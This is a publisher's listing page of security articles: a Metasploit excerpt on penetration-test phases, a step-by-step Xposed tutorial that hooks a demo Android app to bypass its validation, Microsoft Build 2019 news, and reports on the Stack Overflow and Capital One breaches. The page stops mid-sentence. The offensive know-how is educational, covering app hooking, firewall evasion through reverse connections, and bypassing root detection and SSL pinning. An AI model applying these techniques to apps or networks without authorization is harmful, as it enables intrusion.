Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-approaching-penetration-test-using-metasploit
Packt
26 Sep 2016
17 min read
Save for later

Approaching a Penetration Test Using Metasploit

Packt
26 Sep 2016
17 min read
"In God I trust, all others I pen-test" - Binoj Koshy, cyber security expert In this article by Nipun Jaswal, authors of Mastering Metasploit, Second Edition, we will discuss penetration testing, which is an intentional attack on a computer-based system with the intension of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will advise an organization if it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization. (For more resources related to this topic, see here.) Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information gathering and web testing capabilities, and much more. This article has been written so that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This article assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this article will help you recall the basics as well. While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram: This article will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this article. In this article, you will learn about the following topics: The phases of a penetration test The basics of the Metasploit framework The workings of exploits Testing a target network with Metasploit The benefits of using databases An important point to take a note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test. When we think about conducting a penetration test on an organization, we need to make sure that everything is set perfectly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test: Refer to the http://www.pentest-standard.org website to set up the hardware and systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test. Organizing a penetration test Before we start firing sophisticated and complex attack vectors with Metasploit, we must get ourselves comfortable with the work environment. Gathering knowledge about the work environment is a critical factor that comes into play before conducting a penetration test. Let us understand the various phases of a penetration test before jumping into Metasploit exercises and see how to organize a penetration test on a professional scale. Preinteractions The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network; this is done with the client. This serves as the connecting line between the penetration tester and the client. Preinteractions help a client get enough knowledge on what is about to be done over his or her network/domain or server. Therefore, the tester will serve here as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points: Scope: This section discusses the scope of the project and estimates the size of the project. Scope also defines what to include for testing and what to exclude from the test. The tester also discusses ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what all access options are required by the tester? Questionnaires for administrators, the time duration for the test, whether to include stress testing or not, and payment for setting up the terms and conditions are included in the scope. A general scope document provides answers to the following questions: What are the target organization's biggest security concerns? What specific hosts, network address ranges, or applications should be tested? What specific hosts, network address ranges, or applications should explicitly NOT be tested? Are there any third parties that own systems or networks that are in the scope, and which systems do they own (written permission must have been obtained in advance by the target organization)? Will the test be performed against a live production environment or a test environment? Will the penetration test include the following testing techniques: ping sweep of network ranges, port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering? Will the penetration test include internal network testing? If so, how will access be obtained? Are client/end-user systems included in the scope? If so, how many clients will be leveraged? Is social engineering allowed? If so, how may it be used? Are Denial of Service attacks allowed? Are dangerous checks/exploits allowed? Goals: This section discusses various primary and secondary goals that a penetration test is set to achieve. The common questions related to the goals are as follows: What is the business requirement for this penetration test? This is required by a regulatory audit or standard Proactive internal decision to determine all weaknesses What are the objectives? Map out vulnerabilities Demonstrate that the vulnerabilities exist Test the incident response Actual exploitation of a vulnerability in a network, system, or application All of the above Testing terms and definitions: This section discusses basic terminologies with the client and helps him or her understand the terms well Rules of engagement: This section defines the time of testing, timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to rules of engagement are as follows: At what time do you want these tests to be performed? During business hours After business hours Weekend hours During a system maintenance window Will this testing be done on a production environment? If production environments should not be affected, does a similar environment (development and/or test systems) exist that can be used to conduct the penetration test? Who is the technical point of contact? For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png. Intelligence gathering / reconnaissance phase In the intelligence-gathering phase, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or might be a full-fledged fortune company. The most important aspect is to gather information about the target from social media networks and use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Footprinting the organization using active and passive attacks can also be an approach. The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to stimulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help him or her save a large amount of time as well. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is foot printed. It is the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, identifying all the services running on those ports and to decide which services are vulnerable and how to make use of them to enter the desired system. The procedures followed during this phase are required to identify the security policies that are currently set in place at the target, and what we can do to breach them. Let us discuss this using an example. Consider a black box test against a web server where the client wants to perform a network stress test. Here, we will be testing a server to check what level of bandwidth and resource stress the server can bear or in simple terms, how the server is responding to the Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server is able to handle and respond to all the requests successfully or crashes causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets. In order to achieve this, we start our network stress-testing tool and launch an attack towards a target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the website does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of protection mechanism set by the server administrator that sensed our malicious intent of taking the server down, and hence resulting in a ban of our IP address. Therefore, we must collect correct information and identify various security services at the target before launching an attack. The better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all the attack vectors under a virtual environment before launching these attack vectors onto the real targets. A proper validation of the attack vectors is mandatory because if we do not validate the attack vectors prior to the attack, it may crash the service at the target, which is not favorable at all. Network stress tests should generally be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client for white listing IP addresses used for testing. Now let us look at the second example. Consider a black box test against a windows 2012 server. While scanning the target server, we find that port 80 and port 8080 are open. On port 80, we find the latest version of Internet Information Services (IIS) running while on port 8080, we discover that the vulnerable version of the Rejetto HFS Server is running, which is prone to the Remote Code Execution flaw. However, when we try to exploit this vulnerable version of HFS, the exploit fails. This might be a common scenario where inbound malicious traffic is blocked by the firewall. In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. This may prove to be more successful as firewalls are commonly being configured to inspect ingress traffic rather than egress traffic. Coming back to the procedures involved in the intelligence-gathering phase when viewed as a process are as follows: Target selection: This involves selecting the targets to attack, identifying the goals of the attack, and the time of the attack. Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. In addition, it covers off-site gathering that involves data warehouse identification; this phase is generally considered during a white box penetration test. Foot printing: This involves active or passive scans to identify various technologies used at the target, which includes port scanning, banner grabbing, and so on. Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on. For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering Predicting the test grounds A regular occurrence during penetration testers' lives is when they start testing an environment, they know what to do next. If they come across a Windows box, they switch their approach towards the exploits that work perfectly for Windows and leave the rest of the options. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for exploiting a Windows XP box. Suppose a penetration tester needs to visit an organization, and before going there, they learn that 90 percent of the machines in the organization are running on Windows XP, and some of them use Windows 2000 Server. The tester quickly decides that they will be using the NETAPI exploit for XP-based systems and the DCOM exploit for Windows 2000 server from Metasploit to complete the testing phase successfully. However, we will also see how we can use these exploits practically in the latter section of this article. Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to use Windows-based exploits and IIS testing tools, therefore ignoring the exploits and tools for Linux. Hence, predicting the environment under a test helps to build the strategy of the test that we need to follow at the client's site. For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067. For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/Windows /dcerpc/ms03_026_dcom. Modeling threats In order to conduct a comprehensive penetration test, threat modeling is required. This phase focuses on modeling out correct threats, their effect, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence-gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions: How can we attack a particular network? To which crucial sections do we need to gain access? What approach is best suited for the attack? What are the highest-rated threats? Modeling threats will help a penetration tester to perform the following set of operations: Gather relevant documentation about high-level threats Identify an organization's assets on a categorical basis Identify and categorize threats Mapping threats to the assets of an organization Modeling threats will help to define the highest priority assets with threats that can influence these assets. Now, let us discuss a third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Mapping a SQL injection attack to primary and secondary assets is achievable during this phase. Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats clearly and quickly using the automated approach. This can prove to be handy while conducting large tests. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling. Vulnerability analysis Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to web application, an insecure application design for vulnerable database services, and a VOIP-based server to SCADA-based services. This phase generally contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validations. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence. For more information on the processes involved during the threat-modeling phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis. Exploitation and post-exploitation The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered as the actual attack phase. In this phase, a penetration tester fires up exploits at the target vulnerabilities of a system in order to gain access. This phase is covered heavily throughout the article. The post-exploitation phase is the latter phase of exploitation. This phase covers various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on. For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation. Reporting Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this article. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Reporting. Mounting the environment Before going to a war, the soldiers must make sure that their artillery is working perfectly. This is exactly what we are going to follow. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions: How well is your test lab configured? Are all the required tools for testing available? How good is your hardware to support such tools? Before we begin to test anything, we must make sure that all the required set of tools are available and that everything works perfectly. Summary Throughout this article, we have introduced the phases involved in penetration testing. We have also seen how we can set up Metasploit and conduct a black box test on the network. We recalled the basic functionalities of Metasploit as well. We saw how we could perform a penetration test on two different Linux boxes and Windows Server 2012. We also looked at the benefits of using databases in Metasploit. After completing this article, we are equipped with the following: Knowledge of the phases of a penetration test The benefits of using databases in Metasploit The basics of the Metasploit framework Knowledge of the workings of exploits and auxiliary modules Knowledge of the approach to penetration testing with Metasploit The primary goal of this article was to inform you about penetration test phases and Metasploit. We will dive into the coding part of Metasploit and write our custom functionalities to the Metasploit framework. Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Open Source Intelligence [article] Ruby and Metasploit Modules [article]
Read more
  • 0
  • 0
  • 37125

article-image-hacking-android-apps-using-xposed-framework
Packt
13 Jul 2016
6 min read
Save for later

Hacking Android Apps Using the Xposed Framework

Packt
13 Jul 2016
6 min read
In this article by Srinivasa Rao Kotipalli and Mohammed A. Imran, authors of Hacking Android, we will discuss Android security, which is one of the most prominent emerging topics today. Attacks on mobile devices can be categorized into various categories, such as exploiting vulnerabilities in the kernel, attacking vulnerable apps, tricking users to download and run malware and thus stealing personal data from the device, and running misconfigured services on the device. OWASP has also released the Mobile top 10 list, helping the community better understand mobile security as a whole. Although it is hard to cover a lot in a single article, let's look at an interesting topic: the the runtime manipulation of Android applications. Runtime manipulation is controlling application flow at runtime. There are multiple tools and techniques out there to perform runtime manipulation on Android. This article discusses using the Xposed framework to hook onto Android apps. (For more resources related to this topic, see here.) Let's begin! Xposed is a framework that enables developers to write custom modules for hooking onto Android apps and thus modifying their flow at runtime. It was released by rovo89 in 2012. It works by placing the app_process binary in /system/bin/ directory, replacing the original app_process binary. app_process is the binary responsible for starting the zygote process. Basically, when an Android phone is booted, init runs /system/bin/app_process and gives the resulting process the name Zygote. We can hook onto any process that is forked from the Zygote process using the Xposed framework. To demonstrate the capabilities of Xposed framework, I have developed a custom vulnerable application. The package name of the vulnerable app is com.androidpentesting.hackingandroidvulnapp1. The code in the following screenshot shows how the vulnerable application works: This code has a method, setOutput, that is called when the button is clicked. When setOutput is called, the value of i is passed to it as an argument. If you notice, the value of i is initialized to 0. Inside the setOutput function, there is a check to see whether the value of i is equal to 1. If it is, this application will display the text Cracked. But since the initialized value is 0, this app always displays the text You cant crack it. Running the application in an emulator looks like this: Now, our goal is to write an Xposed module to modify the functionality of this app at runtime and thus printing the text Cracked. First, download and install the Xposed APK file in your emulator. Xposed can be downloaded from the following link: http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk Install this downloaded APK file using the following command: adb install [file name].apk Once you've installed this app, launch it, and you should see the following screen: At this stage, make sure that you have everything set up before you proceed. Once you are done with the setup, navigate to the Modules tab, where we can see all the installed Xposed modules. The following figure shows that we currently don't have any modules installed: We will now create a new module to achieve the goal of printing the text Cracked in the target application shown earlier. We use Android Studio to develop this custom module. Here is the step-by-step procedure to simplify the process: The first step is to create a new project in Android Studio by choosing the Add No Actvity option, as shown in the following screenshot. I named it XposedModule. The next step is to add the XposedBridgeAPI library so that we can use Xposed-specific methods within the module. Download the library from the following link: http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d=1400342298 Create a folder called provided within the app directory and place this library inside the provided directory. Now, create a folder called assets inside the app/src/main/ directory, and create a new file called xposed_init.We will add contents to this file in a later step.After completing the first 3 steps, our project directory structure should look like this: Now, open the build.gradle file under the app folder, and add the following line under the dependencies section: provided files('provided/[file name of the Xposed   library.jar]') In my case, it looks like this: Create a new class and name it XposedClass, as shown here: After you're done creating a new class, the project structure should look as shown in the following screenshot: Now, open the xposed_init file that we created earlier, and place the following content in it. com.androidpentesting.xposedmodule.XposedClass This looks like the following screenshot: Now, let's provide some information about the module by adding the following content to AndroidManifest.xml: <meta-data android_name="xposedmodule" android_value="true" />   <meta-data android_name="xposeddescription" android_value="xposed module to bypass the validation" />     <meta-data android_name="xposedminversion" android_value="54" /> Make sure that you add this content to the application section as shown here: Finally, write the actual code within in the XposedClass to add a hook. Here is the piece of code that actually bypasses the validation being done in the target application: Here's what we have done in the previous code: Firstly, our class is implementing IXposedHookLoadPackage We wrote the method implementation for the handleLoadPackage method—this is mandatory when we implement IXposedHookLoadPackage We set up the string values for classToHook and functionToHook An if condition is written to see whether the package name equals the target package name If package name matches, execute the custom code provided inside beforeHookedMethod Within the beforeHookedMethod, we are setting the value of i to 1 and thus when this button is clicked, the value of i will be considered as 1, and the text Cracked will be displayed as a toast message Compile and run this application just like any other Android app, and then check the Modules section of Xposed application. You should see a new module with the name XposedModule, as shown here: Select the module and reboot the emulator. Once the emulator has restarted, run the target application and click on the Crack Me button. As you can see in the screenshot, we have modified the application's functionality at runtime without actually modifying its original code. We can also see the logs by tapping on the Logs section. You can observe the XposedBridge.log method in the source code shown previously. This is the method used to log the following data shown: Summary Xposed without a doubt is one of the best frameworks available out there. Understanding frameworks such as Xposed is essential to understanding Android application security. This article demonstrated the capabilities of the Xposed framework to manipulate the apps at runtime. A lot of other interesting things can be done using Xposed, such as bypassing root detection and SSL pinning. Further resources on this subject: Speeding up Gradle builds for Android [article] https://www.packtpub.com/books/content/incident-response-and-live-analysis [article] Mobile Forensics [article]
Read more
  • 0
  • 0
  • 37060

article-image-microsoft-build-2019-microsoft-showcases-new-updates-to-ms-365-platfrom-with-focus-on-ai-and-developer-productivity
Sugandha Lahoti
07 May 2019
10 min read
Save for later

Microsoft Build 2019: Microsoft showcases new updates to MS 365 platform with focus on AI and developer productivity

Sugandha Lahoti
07 May 2019
10 min read
At the ongoing Microsoft Build 2019 conference, Microsoft has announced a ton of new features and tool releases with a focus on innovation using AI and mixed reality with the intelligent cloud and the intelligent edge. In his opening keynote, Microsoft CEO Satya Nadella outlined the company’s vision and developer opportunity across Microsoft Azure, Microsoft Dynamics 365 and IoT Platform, Microsoft 365, and Microsoft Gaming. “As computing becomes embedded in every aspect of our lives, the choices developers make will define the world we live in,” said Satya Nadella, CEO, Microsoft. “Microsoft is committed to providing developers with trusted tools and platforms spanning every layer of the modern technology stack to build magical experiences that create new opportunity for everyone.” https://youtu.be/rIJRFHDr1QE Increasing developer productivity in Microsoft 365 platform Microsoft Graph data connect Microsoft Graphs are now powered with data connectivity, a service that combines analytics data from the Microsoft Graph with customers’ business data. Microsoft Graph data connect will provide Office 365 data and Microsoft Azure resources to users via a toolset. The migration pipelines are deployed and managed through Azure Data Factory. Microsoft Graph data connect can be used to create new apps shared within enterprises or externally in the Microsoft Azure Marketplace. It is generally available as a feature in Workplace Analytics and also as a standalone SKU for ISVs. More information here. Microsoft Search Microsoft Search works as a unified search experience across all Microsoft apps-  Office, Outlook, SharePoint, OneDrive, Bing and Windows. It applies AI technology from Bing and deep personalized insights surfaced by the Microsoft Graph to personalized searches. Other features included in Microsoft Search are: Search box displacement Zero query typing and key-phrase suggestion feature Query history feature, and personal search query history Administrator access to the history of popular searches for their organizations, but not to search history for individual users Files/people/site/bookmark suggestions Microsoft Search will begin publicly rolling out to all Microsoft 365 and Office 365 commercial subscriptions worldwide at the end of May. Read more on MS Search here. Fluid Framework As the name suggests Microsoft's newly launched Fluid framework allows seamless editing and collaboration between different applications. Essentially, it is a web-based platform and componentized document model that allows users to, for example, edit a document in an application like Word and then share a table from that document in Microsoft Teams (or even a third-party application) with real-time syncing. Microsoft says Fluid can translate text, fetch content, suggest edits, perform compliance checks, and more. The company will launch the software developer kit and the first experiences powered by the Fluid Framework later this year on Microsoft Word, Teams, and Outlook. Read more about Fluid framework here. Microsoft Edge new features Microsoft Build 2019 paved way for a bundle of new features to Microsoft’s flagship web browser, Microsoft Edge. New features include: Internet Explorer mode: This mode integrates Internet Explorer directly into the new Microsoft Edge via a new tab. This allows businesses to run legacy Internet Explorer-based apps in a modern browser. Privacy Tools: Additional privacy controls which allow customers to choose from 3 levels of privacy in Microsoft Edge—Unrestricted, Balanced, and Strict. These options limit third parties to track users across the web.  “Unrestricted” allows all third-party trackers to work on the browser. “Balanced” prevents third-party trackers from sites the user has not visited before. And “Strict” blocks all third-party trackers. Collections: Collections allows users to collect, organize, share and export content more efficiently and with Office integration. Microsoft is also migrating Edge as a whole over to Chromium. This will make Edge easier to develop for by third parties. For more details, visit Microsoft’s developer blog. New toolkit enhancements in Microsoft 365 Platform Windows Terminal Windows Terminal is Microsoft’s new application for Windows command-line users. Top features include: User interface with emoji-rich fonts and graphics-processing-unit-accelerated text rendering Multiple tab support and theming and customization features Powerful command-line user experience for users of PowerShell, Cmd, Windows Subsystem for Linux (WSL) and all forms of command-line application Windows Terminal will arrive in mid-June and will be delivered via the Microsoft Store in Windows 10. Read more here. React Native for Windows Microsoft announced a new open-source project for React Native developers at Microsoft Build 2019. Developers who prefer to use the React/web ecosystem to write user-experience components can now leverage those skills and components on Windows by using “React Native for Windows” implementation. React for Windows is under the MIT License and will allow developers to target any Windows 10 device, including PCs, tablets, Xbox, mixed reality devices and more. The project is being developed on GitHub and is available for developers to test. More mature releases will follow soon. Windows Subsystem for Linux 2 Microsoft rolled out a new architecture for Windows Subsystem for Linux: WSL 2 at the MSBuild 2019. Microsoft will also be shipping a fully open-source Linux kernel with Windows specially tuned for WSL 2. New features include massive file system performance increases (twice as much speed for file-system heavy operations, such as Node Package Manager install). WSL also supports running Linux Docker containers. The next generation of WSL arrives for Insiders in mid-June. More information here. New releases in multiple Developer Tools .NET 5 arrives in 2020 .NET 5 is the next major version of the .NET Platform which will be available in 2020. .NET 5 will have all .NET Core features as well as more additions: One Base Class Library containing APIs for building any type of application More choice on runtime experiences Java interoperability will be available on all platforms. Objective-C and Swift interoperability will be supported on multiple operating systems .NET 5 will provide both Just-in-Time (JIT) and Ahead-of-Time (AOT) compilation models to support multiple compute and device scenarios. .NET 5 also will offer one unified toolchain supported by new SDK project types as well as a flexible deployment model (side-by-side and self-contained EXEs) Detailed information here. ML.NET 1.0 ML.NET is Microsoft’s open-source and cross-platform framework that runs on Windows, Linux, and macOS and makes machine learning accessible for .NET developers. Its new version, ML.NET 1.0, was released at the Microsoft Build Conference 2019 yesterday. Some new features in this release are: Automated Machine Learning Preview: Transforms input data by selecting the best performing ML algorithm with the right settings. AutoML support in ML.NET is in preview and currently supports Regression and Classification ML tasks. ML.NET Model Builder Preview: Model Builder is a simple UI tool for developers which uses AutoML to build ML models. It also generates model training and model consumption code for the best performing model. ML.NET CLI Preview: ML.NET CLI is a dotnet tool which generates ML.NET Models using AutoML and ML.NET. The ML.NET CLI quickly iterates through a dataset for a specific ML Task and produces the best model. Visual Studio IntelliCode, Microsoft’s tool for AI-assisted coding Visual Studio IntelliCode, Microsoft’s AI-assisted coding is now generally available. It is essentially an enhanced IntelliSense, Microsoft’s extremely popular code completion tool. Intellicode is trained by using the code of thousands of open-source projects from GitHub that have at least 100 stars. It is available for C# and XAML for Visual Studio and Java, JavaScript, TypeScript, and Python for Visual Studio Code. IntelliCode also is included by default in Visual Studio 2019, starting in version 16.1 Preview 2. Additional capabilities, such as custom models, remain in public preview. Visual Studio 2019 version 16.1 Preview 2 Visual Studio 2019 version 16.1 Preview 2 release includes IntelliCode and the GitHub extensions by default. It also brings out of preview the Time Travel Debugging feature introduced with version 16.0. Also includes multiple performances and productivity improvements for .NET and C++ developers. Gaming and Mixed Reality Minecraft AR game for mobile devices At the end of Microsoft’s Build 2019 keynote yesterday, Microsoft teased a new Minecraft game in augmented reality, running on a phone. The teaser notes that more information will be coming on May 17th, the 10-year anniversary of Minecraft. https://www.youtube.com/watch?v=UiX0dVXiGa8 HoloLens 2 Development Edition and unreal engine support The HoloLens 2 Development Edition includes a HoloLens 2 device, $500 in Azure credits and three-months free trials of Unity Pro and Unity PiXYZ Plugin for CAD data, starting at $3,500 or as low as $99 per month. The HoloLens 2 Development Edition will be available for preorder soon and will ship later this year. Unreal Engine support for streaming and native platform integration will be available for HoloLens 2 by the end of May. Intelligent Edge and IoT Azure IoT Central new features Microsoft Build 2019 also featured new additions to Azure IoT Central, an IoT software-as-a-service solution. Better rules processing and customs rules with services like Azure Functions or Azure Stream Analytics Multiple dashboards and data visualization options for different types of users Inbound and outbound data connectors, so that operators can integrate with   systems Ability to add custom branding and operator resources to an IoT Central application with new white labeling options New Azure IoT Central features are available for customer trials. IoT Plug and Play IoT Plug and Play is a new, open modeling language to connect IoT devices to the cloud seamlessly without developers having to write a single line of embedded code. IoT Plug and Play also enable device manufacturers to build smarter IoT devices that just work with the cloud. Cloud developers will be able to find IoT Plug and Play enabled devices in Microsoft’s Azure IoT Device Catalog. The first device partners include Compal, Kyocera, and STMicroelectronics, among others. Azure Maps Mobility Service Azure Maps Mobility Service is a new API which provides real-time public transit information, including nearby stops, routes and trip intelligence. This API also will provide transit services to help with city planning, logistics, and transportation. Azure Maps Mobility Service will be in public preview in June. Read more about Azure Maps Mobility Service here. KEDA: Kubernetes-based event-driven autoscaling Microsoft and Red Hat collaborated to create KEDA, which is an open-sourced project that supports the deployment of serverless, event-driven containers on Kubernetes. It can be used in any Kubernetes environment — in any public/private cloud or on-premises such as Azure Kubernetes Service (AKS) and Red Hat OpenShift. KEDA has support for built-in triggers to respond to events happening in other services or components. This allows the container to consume events directly from the source, instead of routing through HTTP. KEDA also presents a new hosting option for Azure Functions that can be deployed as a container in Kubernetes clusters. Securing elections and political campaigns ElectionGuard SDK and Microsoft 365 for Campaigns ElectionGuard, is a free open-source software development kit (SDK) as an extension of Microsoft’s Defending Democracy Program to enable end-to-end verifiability and improved risk-limiting audit capabilities for elections in voting systems. Microsoft365 for Campaigns provides security capabilities of Microsoft 365 Business to political parties and individual candidates. More details here. Microsoft Build is in its 6th year and will continue till 8th May. The conference hosts over 6,000 attendees with early 500 student-age developers and over 2,600 customers and partners in attendance. Watch it live here! Microsoft introduces Remote Development extensions to make remote development easier on VS Code Docker announces a collaboration with Microsoft’s .NET at DockerCon 2019 How Visual Studio Code can help bridge the gap between full-stack development and DevOps [Sponsered by Microsoft]
Read more
  • 0
  • 0
  • 37033

article-image-approx-250-public-network-users-affected-during-stack-overflows-security-attack
Vincy Davis
20 May 2019
4 min read
Save for later

Approx. 250 public network users affected during Stack Overflow's security attack

Vincy Davis
20 May 2019
4 min read
In a security update released on May 16, StackOverflow confirmed that “some level of their production access was gained on May 11”. In a recent “Update to Security Incident” post, Stack Overflow provides further details of the security attack including the actual date and duration of the attack, how the attack took place, and the company’s response to this incident. According to the update, the first intrusion happened on May 5 when a build deployed for the development tier for stackoverflow.com contained a bug. This allowed the attacker to log in to their development tier as well as escalate its access on the production version of stackoverflow.com. From May 5 onwards, the intruder took time to explore the website until May 11. Post which the intruder made changes in the Stack Overflow system to obtain a privileged access on production. This change was identified by the Stack Overflow team and led to immediately revoking their network-wide access and also initiating an investigation on the intrusion. As part of their security procedure to protect sensitive customer data, Stack Overflow maintains separate infrastructure and network for their clients of Teams, Business, and Enterprise products. They have not found any evidence to these systems or customer data being accessed. The Advertising and Talent businesses of Stack Overflow were also not impacted. However, the team has identified some privileged web request that the attacker had made, which might have returned an IP address, names, or emails of approximately 250 public network users of Stack Exchange. These affected users will be notified by Stack Overflow. Steps taken by Stack Overflow in response to the attack Terminated the unauthorized access to the system. Conducted an extensive and detailed audit of all logs and databases that they maintain, which allowed them to trace the steps and actions that were taken. Remediated the original issues that allowed unauthorized access and escalation. Issued a public statement proactively. Engaged third-party forensics and incident response firm to assist with both remediation and learnings of Stack Overflow. Have taken precautionary measures such as cycling secrets, resetting company passwords, and evaluating systems and security levels. Stack Overflow has again promised to provide more public information after their investigation cycle concludes. Many developers are appreciating the quick confirmation, updates and the response taken by Stack Overflow in this security attack incident. https://twitter.com/PeterZaitsev/status/1129542169696657408 A user on Hacker news comments, “I think this is one of the best sets of responses to a security incident I've seen: Disclose the incident ASAP, even before all facts are known. The disclosure doesn't need to have any action items, and in this case, didn't Add more details as investigation proceeds, even before it fully finishes to help clarify scope The proactive communication and transparency could have downsides (causing undue panic), but I think these posts have presented a sense that they have it mostly under control. Of course, this is only possible because they, unlike some other companies, probably do have a good security team who caught this early. I expect the next (or perhaps the 4th) post will be a fuller post-mortem from after the incident. This series of disclosures has given me more confidence in Stack Overflow than I had before!” Another user on Hacker News added, “Stack Overflow seems to be following a very responsible incident response procedure, perhaps instituted by their new VP of Engineering (the author of the OP). It is nice to see.” Read More 2019 Stack Overflow survey: A quick overview Bryan Cantrill on the changing ethical dilemmas in Software Engineering Listen to Uber engineer Yuri Shkuro discuss distributed tracing and observability [Podcast]
Read more
  • 0
  • 0
  • 36037

article-image-ex-amazon-employee-hacks-capital-ones-firewall-to-access-its-amazon-s3-database-100m-us-and-60m-canadian-users-affected
Savia Lobo
30 Jul 2019
8 min read
Save for later

Ex-Amazon employee hacks Capital One's firewall to access its Amazon S3 database; 100m US and 60m Canadian users affected

Savia Lobo
30 Jul 2019
8 min read
Update: On 28th August, an indictment was filed in a US federal district court, which mentioned Thompson allegedly hacked and stole information from an additional 30 AWS-hosted organizations and will face computer abuse charges. Capital One Financial Corp., one of the largest banks in the United States, has been subject to a massive data breach affecting 100 million customers in the U.S and an additional 6 million in Canada. Capital One said the hacker exploited a configuration vulnerability in its firewall that allowed access to the data. In its official statement released yesterday, Capital One revealed that on July 19, it determined an "unauthorized access by an outside individual who obtained certain types of personal information relating to people who had applied for its credit card products and to Capital One credit card customers." Paige A. Thompson, 33, the alleged hacker who broke into Capital One server, was arrested yesterday and appeared in federal court in Seattle. She was an ex-employee from Amazon's Cloud service (AWS), Amazon confirms. The Capital One hacker, an ex-AWS employee, “left a trail online for investigators to follow” FBI Special Agent Joel Martini wrote in a criminal complaint filed on Monday that a “GitHub account belonging to Thompson showed that, earlier this year, someone exploited a firewall vulnerability in Capital One’s network that allowed an attacker to execute a series of commands on the bank’s servers”, according to Ars Technica. IP addresses and other evidence ultimately showed that Thompson was the person who exploited the vulnerability and posted the data to Github, Martini said. “Thompson allegedly used a VPN from IPredator and Tor in an attempt to cover her tracks. At the same 